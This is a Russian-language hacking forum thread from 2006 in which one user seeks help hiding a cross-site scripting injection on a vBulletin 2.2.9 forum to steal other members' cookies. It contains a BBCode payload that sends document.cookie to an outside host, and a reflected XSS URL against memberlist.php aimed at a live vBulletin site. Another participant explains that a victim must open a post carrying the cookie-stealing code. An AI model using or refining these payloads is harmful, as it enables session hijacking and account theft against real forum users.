Как можно зашифровать инъекцию на форум так чтобы ее видно не было?

Как можно зашифровать инъекцию на форум так чтобы ее видно не было?

16.01.2006, 17:48

ПсиХ

Новичок

Регистрация: 13.01.2006

Сообщений: 8

С нами: 10696505

Репутация: 2

Как можно зашифровать инъекцию на форум так чтобы ее видно не было?

Есть форум vBulletin 2.2.9
Судя по всему админы не поленились и закрыли (казалось бы все возможные дыры).

Пробовал множество инъекций в сообщениях, но они все видны или видны на половину

Пример:

Вставлял:

Код HTML:

[url]http://www.[url=http://wj.com/style=display:none,background:url(javascript:docum  ent.images[1].src="http://antichat.ru/cgi-bin/s.jp  g?"+document.cookie,) ]wj[/url][/url]

Форум выводил:

Код HTML:

[url]http://www..src="http://antichat.ru/cgi-bin/s.jp g?"+document.cookie,) ]wj[/url]

как раз то что должно быть скрыто он и выводит!

Хотелось бы побольше узнать про инъекции, как и что надо менять чтобы ее видно не было.

Заранее спасибо.

𝕏 Twitter Reddit Telegram Копировать ссылку

16.01.2006, 19:49

WizART

Участник форума

Регистрация: 19.07.2005

Сообщений: 292

С нами: 10953146

Репутация: 11

Если он выводит тебе сообщение, т.е. тот код что ты ввел, то значит он (код) не сработал => скрытие тебе не поможет, результатом работы кода (обычно) является алерт, или спи**ивание куков, и это никак не отображается... т.е. ты в сам код внедряешь свой код... так что те коды у тебя не работает.

16.01.2006, 19:52

ПсиХ

Новичок

Регистрация: 13.01.2006

Сообщений: 8

С нами: 10696505

Репутация: 2

Цитата:

Сообщение от WizART

Хорошо, а как это обойти ?

16.01.2006, 20:02

WizART

Участник форума

Регистрация: 19.07.2005

Сообщений: 292

С нами: 10953146

Репутация: 11

Это нельзя "обойти", если код не работает - значит уже пропатчили, ищи другой код или уязвимости в этой версии форума. Поищи баги на СекЛабе(http://securitylab.ru)

16.01.2006, 20:31

ПсиХ

Новичок

Регистрация: 13.01.2006

Сообщений: 8

С нами: 10696505

Репутация: 2

Цитата:

Сообщение от WizART

на секлабе нашел прочку,

вот:

Код:

memberlist.php?ХХХs= ХХХ 23c37cf1af5d2ad05f49361b0407 ХХ ad9e&what=">"<Script>javascript:alert(document.cookie)</Script>

помог мне добыть мои же кукис, когда я был на форуме и ввел это в броузер!

а как достать нужные кукис пока не знаю (есть предложения ? )

Последний раз редактировалось ПсиХ; 16.01.2006 в 20:35..

16.01.2006, 20:49

WizART

Участник форума

Регистрация: 19.07.2005

Сообщений: 292

С нами: 10953146

Репутация: 11

Прально, чтобы добыть чужие кукис нужно чтобы другой чел открыл тему/пост с кодом, который пи*дит куки...

16.01.2006, 20:57

ПсиХ

Новичок

Регистрация: 13.01.2006

Сообщений: 8

С нами: 10696505

Репутация: 2

Цитата:

Сообщение от WizART

Прально, чтобы добыть чужие кукис нужно чтобы другой чел открыл тему/пост с кодом, который пи*дит куки...

Дык чтобы использовать и получать чужие кукис это

Код:

http://www.vbulletin.com/forum/memberlist.php? Х s Х = Х 23c37cf1af5d2ad05f49361b0407 ХХХ ad9e &what=">"<Scr*ipt>javascript:alert(document.cookie)</Scr*ipt>

нужно как нибудь преобразовать, ведь эта фактически ссылка а не инъекция или еще что! и работает она на добавлении кода с получением кукисов